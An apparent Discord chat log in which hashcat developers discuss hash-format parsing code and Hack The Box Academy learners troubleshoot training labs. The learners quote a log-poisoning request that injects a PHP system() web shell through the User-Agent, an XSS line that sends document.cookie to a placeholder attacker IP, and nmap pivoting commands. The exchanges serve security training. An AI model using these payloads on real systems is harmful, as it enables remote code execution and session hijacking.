token.attr[1] = TOKEN_ATTR_VERIFY_LENGTH;
// realm
token.sep[2] = '$';
token.len_min[2] = 0;
token.len_max[2] = 64;
token.attr[2] = TOKEN_ATTR_VERIFY_LENGTH;
// salt
token.sep[3] = '$';
token.len_min[3] = 0;
token.len_max[3] = 128;
token.attr[3] = TOKEN_ATTR_VERIFY_LENGTH;
// encrypted timestamp: fixed 72 hex characters, must be valid hex
token.len[4] = 72;
token.attr[4] = TOKEN_ATTR_FIXED_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
// checksum: fixed 32 hex characters, must be valid hex
token.len[5] = 32;
token.attr[5] = TOKEN_ATTR_FIXED_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
```
you can see here that we dont check just lengths and encoding
in this case we check the "signature" as well
to easily ID the hash type
i assume that hash type/signature is what the check does when you're confused on which mode to use and you pray it works 
But how often is really just one token wrong? I would assume that error pops up if someone tries to use the wrong hash format or copied it wrong, and in that case would an error like "you tried cracking hash x that usually has the format 'username:xxxxx:yyyyy' but your format is 'username:xxxxx', please fix" not help more?
and spit out the ones that didnt error
lol
oh interesting
more often than you'd think unfortunately
that's chaotic and I love it
I've never used autodetect for hashcat
the only way we could make autodetect even remotely accurate
was to step through everything
and even then, its still essentially a VERY fancy regex
Me neither, always search for the hash type
but it works™️
if i'm confused on it then i'll autodetect and pray
or throw it at john and be like "lol good luck have fun"
I always dig through example hashes and compare those with what I have 
if I'm not sure
The example_hashes page hasn't let me down yet
because i know in essence that most hash signatures are at the start
to be fair
i ALSO dig through the example hashes page
long before i try to autodetect
so there's that haha
I'm doing it right
it just depends on how much i'm already frustrated
I'm still having problems 😦 Can someone dm me ?
and if someone messes up renewing ssl hashcat --example_hashes
surely that won't ever happen again
that examples output and the help output are dynamic
it goes and gets those from every module present
meaning if you load in a custom plugin/module/etc.
it will appear in those outputs
as well as being considered for autodetect (assuming you didnt disable it)
that's actually cool, i didn't realize that would be dynamic
saves on having to store a ton of text in more than 1 place
what do you do for ntlmv2 when the length is not constant, skip length checking for MessageDependentFields and payload fields?
well lets see
```c
// username
token.sep[0] = ':';
token.len_min[0] = 0;
token.len_max[0] = 60;
token.attr[0] = TOKEN_ATTR_VERIFY_LENGTH;
// unused
token.sep[1] = ':';
token.len[1] = 0;
token.attr[1] = TOKEN_ATTR_FIXED_LENGTH;
// domain
token.len_min[2] = 0;
token.len_max[2] = 45;
token.sep[2] = ':';
token.attr[2] = TOKEN_ATTR_VERIFY_LENGTH;
// lm response
token.sep[3] = ':';
token.len[3] = 16;
token.attr[3] = TOKEN_ATTR_FIXED_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
// ntlm response
token.sep[4] = ':';
token.len[4] = 32;
token.attr[4] = TOKEN_ATTR_FIXED_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
// challenge
token.sep[5] = ':';
token.len_min[5] = 2;
token.len_max[5] = 1024;
token.attr[5] = TOKEN_ATTR_VERIFY_LENGTH
              | TOKEN_ATTR_VERIFY_HEX;
```
min/max based on the struct/buffer limits
Make sure you run silketw as admin and that it keeps running while you run the other command, it only logs while it’s active
challenge can be between 1 byte and 512 bytes long, encoded as 2-1024 hex characters
@maiden field
Whoops reply was off
i've done that so many times
who can help me plse
ah I see, checks for the limit
right, we just give it variable lengths
alright we're flooding this channel now with non-module related things as fun as it is to pick at the chicken's brain
yeah thank you for your time sir
Technically, with the existence of a Hashcat module, one could argue it's all related
🙂
i just mean other people have been getting drowned out
though to be fair, that module needs some... work
and every module that recommends using --force
that's probably the problem ill try that thanks
but yeah, probably best not to spam a help channel
yeaaaaah
I hear it does, I haven't done it myself to see
did you mention that you could help with writing that, would be really cool to have that 
It was mostly accurate when it launched but its not been updated recently
and stuff moves real fast around here
I've just picked up not to use --force no matter how much they push it
so it got outdated fast
that'd be cool, not clue how to go about getting that done though
when you do, you're seeing like 3 or 4 levels of warnings/errors I personally put in 🙂
"this time, it's personal" 😛
Yeah, I've seen you explain it to people so many times 😁
might need to contact the academy team but I too have no idea
I might gate force behind one of our compile configs
so that normal users can't even use it
we've talked about it before but the influx of issues it'd cause would be... interesting to say the least
why is my pc emitting smoke
lol
@ivory prawn the fuck do you want?
....wow!!
i did not ask you to dm me; and if you cannot ask it here then i will assume it's illegal and decline further communication attempts
maybe read the #rules
i need help for my computer, i'm new in this, sorry to bother you
unsolicited DMs are against the rules
and this server isnt tech support
ask in #1024429874246590575 (and don't ping me either when you ask)
grateful , very kind
I had to put "Don't DM without asking" on my profile, it has not helped lol
it worked thanks a lot 🙂
i gave up a long time ago
i swear, i cant clear them fast enough to drop below about 30-40
can I bother here for some starting point help? I am having connectivity issues
I just hit ignore, but with you as a dev, I can't even imagine how flooded your DMs are
there are close to 7k people in just our discord
terminate machine, terminate vpn, download and change vpn connection pray
and very few active as community members
lots of 1 off people which inevitably means lots of DMs
Yeah, and when the server is yours, you don't have much of a choice
well gonna try again
I cant ask support cuz of the holidays
are the dms just "y dis hash no work"
tbh I haven't run into problem with hashcat which I can't fix myself
most arent even hashcat related
which idk if thats better or worse
a lot of "hack this instagram/snapchat" of course
but also a lot of very... odd requests and messages
i'm also in 100+ security servers so that doesnt help
I think that's worse 
someone can help me with ATTACKING COMMON APPLICATIONS - WordPress - Discovery & Enumeration with the question "Find the version number of this plugin. (i.e., 4.5.2)"?
use the hint, check the files
it asks for a version number btw
Hello Guys, can someone help me check something, whether the problem is only on my connection or for the entire module: https://academy.hackthebox.com/module/67/section/2502 CITRIX Breakout
we should get on the link to access the WIN device, BUT if I go there I receive a redirect
to : https://www.fbi.gov/how-we-can-help-you/scams-and-safety/on-the-internet
I found
akismet
contact-form-7
mail-masta
mailchimp-for-wp
wp-sitemap-page
wpdiscuz
but all of them incorrect answer
can someone give me a hand with the file inclusion log poisoning module section? Nothing seems to be working. I go to the site and use burp...intercept...then i send to repeater and change the GET to add this ||GET /index.php?language=../../../../var/log/apache2/access.log&cmd=ls+/ ||and then user agent to this ||User-Agent:<?php system($_GET['cmd']);?>|| , but i get nothing in return for the response field...any advice or tips for what i may be missing?
go to the url inside the rdp session of target
it needs version number
i no talk to u
this isn't for posting jobs or job offers or anything like that my dude
your name is mr.brain but it appears you lack one
check if you can access the log first
Hi, I still can't scan internal network with nmap, It goes over all the hosts then starts a port scan that doesn't end. I just want to see the active hosts on the network.
@next bronze so when i encode / use %2F within the URL i do as shown here
What module is this for and what's your command? Sorry, missed when you first asked
nmap through proxychains
Pivoting module on the internal network in the skill assessment lab. Ran: ||proxychains nmap -sT 172.16.5.0/24||
I don't see the log being poisoned
isn't host scanning -sn
Tried it as well, it just goes over all the hosts and then performs a port scan even though it's by definition not a port scan
don't do it with -sT
don't you need -sT when going through proxychains
only if you're doing port scans
-sT is specifically scan tcp port
and overrides options that disable port scanning
@next bronze - ok - let me check what could be the issue
Hmm, perhaps try -Pn -sT -p88,445 $iprange, my go-to when I'm just trying to find hosts quickly in an AD environment through a proxy, then you can scan more once you find something
well yeah, you can't do ICMP over proxychains so need to fallback to port scanning to find which host is up
Trying now, thanks everyone
Would recommend ligolo
that or I usually do -Pn -sT -F -T4 so it can find linux hosts too
Easy to clear pivoting skills assessment
I'm having a problem with the module about XSS -> Session hijacking . Can anyone help me troubleshoot it? It must be a trivial thing
But then it tries scanning 100 ports instead of one and it takes so much longer, doesn't it?
Would look into it tomorrow
-F scans top 100
Sorry the top hundred
I almost got the hash for the last question in the AD skills assessment and then the pwnbox shutdown 😦
Snort Rule Development (There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword]; )
I got the rule work, but HTB didn't accept my answer
-T4 reduces timeout and retries so it will be faster, but yes it will take longer compared to scanning only 2 ports
Which one did you put?
just why i can't loggin that say captcha is required and there is 0 captcha
There’s something that works better than the one you put, remember you basically want to check the user agent, so where is that one located in a http request
disable adblock
i don't have just a vpn
i already disabled the vpn and that isn't work
There is a version of captcha that automatically deduces if your behavior across the internet is non-human
Meaning, that the captcha that you've been used to see has a different version, that doesn't require you to click on the sidewalks or bridges
Got it, thank you for the hint 💖
It just tells me that all the hosts are up, which obviously they aren't. And there isn't any difference between the real active hosts and the fake ones
That's intended behaviour for -Pn, did the scan not finish?
And done. Great module 😄 But some parts were definitely annoying
These are the results when it finished
it will tell you host is up, but if it is really up you will see info on the ports
I found the input field vulnerable to xss, I'm able to trigger a request to script.js, but that doesn't make a request to index.php . Then I tried without passing through script.js and making a direct request to index.php using the code provided in the module, a file cookies.txt is created with the remote IP address but no session cookie in it. Strange
Example:
```
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 172.16.5.242
Host is up (6.4s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 172.16.5.243
Host is up (2.8s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 172.16.5.244
Host is up (2.8s latency).
```
Yeah I don't have any info about them
445 feedback
What if you add --open to the command? Otherwise ngl, I'm confused, is there any chance proxychains isn't set up correctly?
For who that are stuck here, don't put the square bracket in the answer
also keep in mind that there are 255 hosts scanned, you might need to scroll up to find the alive ones
if you don't comment out the other socks4/5 sometimes it breaks
Yeah, --open will show only open ports, otherwise might be a bad configuration
at the same time i don't recall fighting that hard with this
Checked it, the /etc/proxychains.conf contains socks4 127.0.0.1 9050 and I start the dynamic port forwarding with ssh -D 9050 and just use proxychains
I did
Is it possible that the lab is acting really really weird?
that too
Hello folks. I was wondering if anyone has worked on
Analyzing Evil With Sysmon & Event Logs for the SOC Analyst path. I am having issues with Replicate the Unmanaged PowerShell attack described in this section and provide the SHA256 hash of clrjit.dll that spoolsv.exe will load as your answer. "C:\Tools\Sysmon" and "C:\Tools\PSInject" on the spawned target contain everything you need. I cannot seem to be able to get the injection it gives working and make the spooler show how it is supposed to.
A reset is probably in order
I did reset the machine a couple times. I'm considering to just move on to AD and hope nmap behaves there. If it won't I'll have to recheck the config even though I really don't think it is the config which is very simple here
--open didn't help either?
Trying it now. Each scan takes 15 mins approximately
I did the skills assessment with ligolo-ng here but I haven't had issues with nmap through proxychains when I've used it
Yeah, nmap through proxychains is pretty slow, another reason to learn ligolo 😁
I'll look at ligolo later, sounds like a much better option
I'll at least let this scan finish, the last chance haha
Thanks for all the help! I really appreciate it
No problem
I'm putting new Image().src='http://OUR_IP/index.php?c='+document.cookie in script.js as suggested by the module. Obviously I put the ip of the server. It doesn't make a call to index.php . I don't know why. Do I need to change anything?
Dumb question but why isn't klist working?
```
└─$ export KRB5CCNAME=ksimpson.ccache
┌──(ruderaph㉿Rude)-[~/boxes/scrambled]
└─$ klist
Command 'klist' not found, did you mean:
command 'mlist' from deb mblaze
command 'flist' from deb mmh
command 'flist' from deb nmh
Try: sudo apt install <deb name>
```
perhaps you don't have the kerberos thing installed
I'm googling that now but i figured it would be downloaded already? i believe i've used this before on my old kali but don't remember downloading it.
are both files in the same web dir?
yes
Would it be kerberoast?
That didn't work after installing it
google debian install klist
I have a GET /script.js but not a /GET for index.php
I do not believe it is the IP of the server. Did you do an ip a ?
yes, I solved it. It actually was a port error this time, but I tried multiple times and I thought I wrote correctly before..strange..I also experienced a lot of network problems with this module.
glad, I finally got the flag. Thanks for your help
hi everyone im doing the intro to academy and I spawned a target ip but my browser doesnt want to show me the targets vpn key connection. any ideas? tried disabling ad blocker already.
It took me three days to do it because it kept crashing on me.
Do you have a screenshot?
i dont lemme login on kali
it took me 2 days because I got a timeout error most of the times
if it's a public_ip:port it won't prompt for the vpn download
I am happy you solved it. I did not have a port error. I just kept not getting a response. Nothing was showing me with NC at all on a few of them, I only got PHP to work. I waited until Christmas afternoon/evening when I figured less people would be on and I got it right away.
oh man.. my next step will be networking basics! lol. thank you!
My wife had to apologize to our guests because I kept getting up and "messing" with my computer, lol.
lol I was stuck on that for Christmas
Glad it was not just me. I was on it since Saturday evening. I thought I was going crazy.
do you know the credentials for Kali? First time use or not? For HTB Academy you also can use Pwnbox that uses Parrot OS though
I do. Ive had my kali vm running for a few weeks now just messing around and learning. messed with a parrot live usb too. I just went with kali. and yeh I saw they give you 2 hours of their parrot vm. probably will use that too. long as im learning lol
kali:kali
but the module only let me spawn the parrot vm once. so I thought i needed to connect to the target
you only need a vm(vpn)/pwnbox if it's an internal networked host (generally 10.129.x.x)
hey i need some help. am doing the cross site scripting module and am in the XSS discovery. i git cloned the XSStriker but it doesnt let me open it. i type: python xsstrike.py and it says: bash: python: command not found. can someone help me please
try specifying python3
the Parrot VM already is in the internal network, then you just need to use the target IP in the browser or with the tools you wanna use
yeah I remember when I did that module, it required python3
if python isn't installed at all (which would be odd) then you'd need to install it
gotcha. thanks guys
whats up with nmap always timing out unless I'm active on it clicking enter enter to look at progress?
are all hackthebox VM's like this?
It's not really Nmap timing out, it's a weird delay thing if you're using pwnbox
I prefer using my own vm, works 90% of the time more reliably
I just CD into the directory and ran it that way. I just do not remember how. I had to google for a while, lol.
please help with Skills Assessment HTTP ATTACKS. I just tried everything and have no idea why the letter is not coming. Who can I contact for help?
Yea, I'm using my own box as well and scanning the target after spinning it up. It's pretty annoying.
Make sure you don't have the pwnbox running at the same time as you're running your vm with the vpn
This may sound super silly but how would I know if I have the pwnbox open as well lol.
It would show up on your screen in a little window?
Well in academy there's the little window
I'm assuming you're on academy because that's what this channel is about
Hi guys
I have created a page for some of the cheat sheets of the htb academy on : https://wiki.hego.tech/web-attack/htb-cheet-sheet
Not sure if that's allowed tbh @languid fjord what's the ruling on something like this
All of those are free modules on the Academy. if you think I'm not allowed, I can remove it
by free modules I mean those ones that users can work on at first (Like the fundamentals)
Skills Assessment - Zeek (There is a file named neutrinogootkit.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Neutrino exploit kit sending Gootkit malware. Enter the x509.log field name that includes the "MyCompany Ltd." trace as your answer. )
I got the answer but still doesn't work, someone can help me?
Has anyone been able to complete Windows Event Logs & Finding Evil? I am stuck on the assessment. I am having trouble keeping a connection. This was supposed to be a quick one, but has taken me almost 8 hours. I am just stuck and annoyed now.
The blue team modules are not very interesting and have poor content and questions not well explained. I will not continue anymore to do blue modules. I will go back to offensive modules
I have been thinking the same thing. I heard from a few folks on YouTube that the new cert from this path is supposed to be good. I do not like leaving things unfinished. I am about half way done with Bug Hunting and SOC stuff. Good luck. I just want to at least finish this last assessment, if I do not go nuts from the disconnections.
I'm having trouble connecting via ssh for the Linux Fundamentals lab. When I run ssh, I run it like bash ssh htb-student@IPv4(Private) but it times out eventually. Should I add the port #?
If there is one, it might work.
How would I add it? bash ssh htb-student@IPv4(Private addy):PORT?
ssh user@ip -p port iirc
Ohhh, ty
-p
Get discord formatted lol
Most commands have a port specifier option, the ones that don't usually are ip:port or ip port
Like ftp
If you are doing the SOC stuff, be prepared to lose your hair with time outs, lol.
yepppppppp
fml
Did you do the soc analyst pre-requisite path?
I'm going to be honest, idk what that means.
I did everything except the assessment for the Assembly Language.
There's a skill path labeled "Soc Analyst Prerequisite"
I had that issue, so I ended up getting a Windows based computer. M1s have been doing better about having VMs that work on it. I think VirtualBox has a VM specifically designed for ParrotOS
Especially since you sound new that one and "information security fundamentals" path is another basic one
To get you more grounded in it
Yeah, I'm sitting in my living room typing on my mac and doing preparations on mac but I also have an intel-based 64-bit desktop here
but my laptop (macbook) is more portable :(
I have not given up on a module other than the Assembly Language, and I think I will give up on another one today. Well, I guess if I had help with Windows Event Logs & Finding Evil assessment before I get kicked out of the darn box again, I would stay.
I also suggest (in general) having a workspace. Minimal distraction aside from the computer and the internet
Treat it like a school station basically
Or a workplace
what are you stuck with?
For both the Assembly and Finding Evil it is the assessment. I am currently working on Finding Evil. It is this question:
By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe
I meant the assembly module, can't help you with this one 😅
Lol, I am not sure anyone can help me with this one, lol. It seems like many folks have been stuck on it. Please give me a moment to get that module open.
I have done it, it's not too difficult actually
Maybe I will go back and give it a try. My wife just got home from work, and will probably want me to get off. I have a few days off for the holidays, but I doubt I should spend hours on this, lol. I did go look, and I guess I am not as far in as I thought. I am on Procedures
I don't mean to interrupt your convo but do y'all use UDP or TCP protocol?
It would depend, I guess. I have tried both. I prefer speed instead of getting perfect packets.
If I remember correctly, TCP is less reliable but has less packet loss
(I'm prob wrong)
ah I see, well if you need help with it just give me a ping
that greatly depends on what you're doing, different tools for different jobs
That would be great. I am glad I did not promise I would do stuff today. I work from home, but that does not mean I am able to do things around the house. I cannot use that excuse now. If you do not mind, I can work on it some tomorrow and ping you if I am stuck.
I don't think you'll have too much problem with the sections, the skills assessment can be a bit tricky
I'm working on the Linux Fundamentals lab and I'm running into timeouts. Should I pick a specific protocol?
I do not recall, are you doing it locally?
Oh oops, I mean connecting via ssh but experiencing timeouts
Thought I added that part, mb
oh you meant the vpn, should get tcp, you'll be rdping into machines later and unstable connection will kill the session
I have killed the instance deleted the vpn file and try again.
Make sure you also don't have the pwnbox running too
damn i hate SMB, finally finished this chapter in Foothold
(on my Win10 OS desktop, running Pwnbox on a VM) brew does not want to install openvpn 😦
I have that running on my desktop, but not on my laptop
Try getting a local VM
omg, I'm so sped
Running pwnbox will interfere with your vpn connection
Look at the Parrotbox site and you can download an image that does not even need to be installed into the VM
"Running pwnbox on a vm" what does that even mean? Are you running the in-browser vm, inside another vm?
sorry, english isn't my first language
I'm running Pwnbox OS via Oracle VM VirtualBox on my windows 10 desktop
No worries at all
OK so you are running parrotOS
There is no pwnboxOS
on a VM, yes
It's only named that because of their partnership but AFAIK htb does not maintain that version on parrotsec
ah, igu
Pwnbox is used to exclusively refer to the in-browser vm
ohhhh
hey
Hey, I'm having trouble on the Conditional Branching section of Intro to Assembly. I changed the mov rax to 2 so that it would equal 10 and exit out of the loop, but when I run it through gef I can't find the right hex value. I'm stumped y'all, any guidance that you can throw my way?
they asked for the hex value
Yes.
the answer is right in front of you, read what the question wants again
So I'm running the right thing through gef? That's the main thing that I want to know, that I'm examining the right thing because every hex value that I plug in doesn't work
you don't need to use gdb at all
you already have the answer, read carefully what the question is asking for
Hey anyone look at the SSRF modules in the CBBH and notice that the Payloads used for the SSTI's are not found in the git repo?
Oh snap wrong chat sorry yall
Hi, I am doing the password attacks module and am having trouble with enumerating the foothold on 'Linux Local Password Attacks'. I've brute-forced all available services with the password and username list provided. I can't seem to find anything that works, as there is only null session directory listing for smb and no anonymous ftp. I read the hint and tried those credentials and similar ones but have found nothing to work. Where should I go with this?
Dm
Hi everyone, I'm completely new and just started my journey on HTB. I'm busy with the Getting Started module. I cannot seem to ping 10.10.10.121
Or go through the walkthrough properly
Downloaded my own Parrot OS and installed it on Hyper-V. It took some time to get to full screen but I got that working; the copy and paste doesn't work well, I tried to get it to work. I think it works better on VirtualBox. Anyway, I connect via OpenVPN and received an IP
are you connecting on the vpn using your host OS, or your VM?
double check the configuration you have between host os and VM, see if you're getting an ip on the subnet